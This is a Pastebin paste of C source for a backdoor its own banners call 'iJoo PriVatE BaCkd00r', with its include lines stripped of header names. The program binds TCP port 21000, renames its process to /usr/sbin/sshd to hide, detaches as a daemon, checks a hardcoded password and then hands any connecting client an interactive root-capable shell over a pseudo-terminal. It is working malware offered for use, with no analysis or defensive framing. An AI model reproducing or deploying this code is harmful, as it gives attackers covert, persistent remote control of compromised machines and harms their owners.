API tools faq
paste
genol

bind

genol
May 21st, 2020
25
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.76 KB | None | 0 0
raw download clone embed print report
  1. #define HOME "/"
  2. #define TIOCSCTTY 0x540E
  3. #define TIOCGWINSZ 0x5413
  4. #define TIOCSWINSZ 0x5414
  5. #define ECHAR 0x1d
  6. #define PORT 21000
  7. #define BUF 32768
  8. #define proc "/usr/sbin/sshd"
  9.  
  10. #include
  11. #include
  12. #include
  13. #include
  14. #include
  15. #include
  16. #include
  17. #include
  18. #include
  19. #include
  20. #include
  21. #include
  22.  
  23. struct winsize {
  24. unsigned short ws_row;
  25. unsigned short ws_col;
  26. unsigned short ws_xpixel;
  27. unsigned short ws_ypixel;
  28. };
  29.  
  30. int sc;
  31. char passwd[] = "sikatro0t2100";
  32. char motd[] ="=- iJoo PriVatE BaCkd00r -=\n";
  33.  
  34. void cb_shell() {
  35. char buffer[150];
  36.  
  37. write(sc, "..:+: WelCome To ijooBIND TeLNet :+:..\nPassWord: ", 50);
  38. read(sc, buffer, sizeof(buffer));
  39. if (!strncmp(buffer, passwd, strlen(passwd))) {
  40. write(sc, motd, sizeof(motd));
  41. }
  42. else {
  43. write(sc, "DiE!!!\n", 7);
  44. close(sc); exit(0);
  45. }
  46. }
  47.  
  48. /* creates tty/pty name by index */
  49. void get_tty(int num, char *base, char *buf)
  50. {
  51. char series[] = "pqrstuvwxyzabcde";
  52. char subs[] = "0123456789abcdef";
  53. int pos = strlen(base);
  54. strcpy(buf, base);
  55. buf[pos] = series[(num >> 4) & 0xF];
  56. buf[pos+1] = subs[num & 0xF];
  57. buf[pos+2] = 0;
  58. }
  59.  
  60. /* search for free pty and open it */
  61. int open_tty(int *tty, int *pty)
  62. {
  63. char buf[512];
  64. int i, fd;
  65.  
  66. fd = open("/dev/ptmx", O_RDWR);
  67. close(fd);
  68.  
  69. for (i=0; i < 256; i++) {
  70. get_tty(i, "/dev/pty", buf);
  71. *pty = open(buf, O_RDWR);
  72. if (*pty < 0) continue;
  73. get_tty(i, "/dev/tty", buf);
  74. *tty = open(buf, O_RDWR);
  75. if (*tty < 0) {
  76. close(*pty);
  77. continue;
  78. }
  79. return 1;
  80. }
  81. return 0;
  82. }
  83.  
  84.  
  85.  
  86. /* to avoid creating zombies ;) */
  87. void sig_child(int i)
  88. {
  89. signal(SIGCHLD, sig_child);
  90. waitpid(-1, NULL, WNOHANG);
  91. }
  92.  
  93. void hangout(int i)
  94. {
  95. kill(0, SIGHUP);
  96. kill(0, SIGTERM);
  97. }
  98.  
  99. int main (int argc, char *argv[])
  100. {
  101.  
  102. int pid;
  103. struct sockaddr_in serv;
  104. struct sockaddr_in cli;
  105. int sock;
  106. char cmd[256];
  107. strcpy (argv[0], proc);
  108. signal (SIGCHLD, SIG_IGN);
  109. sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  110. if (sock < 0) {
  111. perror("socket");
  112. return 1;
  113. }
  114.  
  115. bzero((char *) &serv, sizeof(serv));
  116. serv.sin_family = AF_INET;
  117. serv.sin_addr.s_addr = htonl(INADDR_ANY);
  118. serv.sin_port = htons(PORT);
  119. if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
  120. perror("bind");
  121. return 1;
  122. }
  123. if (listen(sock, 5) < 0) {
  124. perror("listen");
  125. return 1;
  126. }
  127. printf("ijooBIND is starting..."); fflush(stdout);
  128. pid = fork();
  129. if (pid !=0 ) {
  130. printf("OK, pid = %d\n", pid);
  131. printf("#MalangHackerLink Private BackD00r.. on 21000\n");
  132. return 0;
  133. }
  134.  
  135. /* daemonize */
  136. setsid();
  137. chdir("/");
  138. pid = open("/dev/null", O_RDWR);
  139. dup2(pid, 0);
  140. dup2(pid, 1);
  141. dup2(pid, 2);
  142. close(pid);
  143. signal(SIGHUP, SIG_IGN);
  144. signal(SIGCHLD, sig_child);
  145. while (1) {
  146. int scli;
  147. int slen;
  148. slen = sizeof(cli);
  149. scli = accept(sock, (struct sockaddr *) &cli, &slen);
  150. if (scli < 0) continue;
  151. pid = fork();
  152. if (pid == 0) {
  153. int subshell;
  154. int tty;
  155. int pty;
  156. fd_set fds;
  157. char buf[BUF];
  158. char *argv[] = {"sh", "-i", NULL};
  159. #define MAXENV 256
  160. #define ENVLEN 256
  161. char *envp[MAXENV];
  162. char envbuf[(MAXENV+2) * ENVLEN];
  163. int j, i;
  164. char home[256];
  165. /* setup enviroment */
  166. envp[0] = home;
  167. sprintf(home, "HOME=%s", HOME);
  168. j = 0;
  169. do {
  170. i = read(scli, &envbuf[j * ENVLEN], ENVLEN);
  171. envp[j+1] = &envbuf[j * ENVLEN];
  172. j++;
  173. if ((j >= MAXENV) || (i < ENVLEN)) break;
  174. } while (envbuf[(j-1) * ENVLEN] != '\n');
  175. envp[j+1] = NULL;
  176.  
  177. /* create new group */
  178. setpgid(0, 0);
  179.  
  180. /* open slave & master side of tty */
  181. if (!open_tty(&tty, &pty)) {
  182. char msg[] = "Can't fork pty, bye!\n";
  183. write(scli, msg, strlen(msg));
  184. close(scli);
  185. exit(0);
  186. }
  187. /* fork child */
  188. subshell = fork();
  189. if (subshell == 0) {
  190. /* close master */
  191. close(pty);
  192. /* attach tty */
  193. setsid();
  194. ioctl(tty, TIOCSCTTY);
  195. /* close local part of connection */
  196. close(scli);
  197. close(sock);
  198. signal(SIGHUP, SIG_DFL);
  199. signal(SIGCHLD, SIG_DFL);
  200. dup2(tty, 0);
  201. dup2(tty, 1);
  202. dup2(tty, 2);
  203. close(tty);
  204. cb_shell();
  205. execve("/bin/sh", argv, envp);
  206. }
  207. /* close slave */
  208. close(tty);
  209.  
  210. signal(SIGHUP, hangout);
  211. signal(SIGTERM, hangout);
  212.  
  213. while (1) {
  214. /* watch tty and client side */
  215. FD_ZERO(&fds);
  216. FD_SET(pty, &fds);
  217. FD_SET(scli, &fds);
  218. if (select((pty > scli) ? (pty+1) : (scli+1),
  219. &fds, NULL, NULL, NULL) < 0)
  220. {
  221. break;
  222. }
  223. if (FD_ISSET(pty, &fds)) {
  224. int count;
  225. count = read(pty, buf, BUF);
  226. if (count <= 0) break;
  227. if (write(scli, buf, count) <= 0) break;
  228. }
  229. if (FD_ISSET(scli, &fds)) {
  230. int count;
  231. unsigned char *p, *d;
  232. d = buf;
  233. count = read(scli, buf, BUF);
  234. if (count <= 0) break;
  235.  
  236. /* setup win size */
  237. p = memchr(buf, ECHAR, count);
  238. if (p) {
  239. unsigned char wb[5];
  240. int rlen = count - ((ulong) p - (ulong) buf);
  241. struct winsize ws;
  242.  
  243. /* wait for rest */
  244. if (rlen > 5) rlen = 5;
  245. memcpy(wb, p, rlen);
  246. if (rlen < 5) {
  247. read(scli, &wb[rlen], 5 - rlen);
  248. }
  249.  
  250. /* setup window */
  251. ws.ws_xpixel = ws.ws_ypixel = 0;
  252. ws.ws_col = (wb[1] << 8) + wb[2];
  253. ws.ws_row = (wb[3] << 8) + wb[4];
  254. ioctl(pty, TIOCSWINSZ, &ws);
  255. kill(0, SIGWINCH);
  256.  
  257. /* write the rest */
  258. write(pty, buf, (ulong) p - (ulong) buf);
  259. rlen = ((ulong) buf + count) - ((ulong)p+5);
  260. if (rlen > 0) write(pty, p+5, rlen);
  261. } else
  262. if (write(pty, d, count) <= 0) break;
  263.  
  264. }
  265. }
  266. close(scli);
  267. close(sock);
  268. close(pty);
  269. waitpid(subshell, NULL, 0);
  270. vhangup();
  271. exit(0);
  272. }
  273. close(scli);
  274. }
  275. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!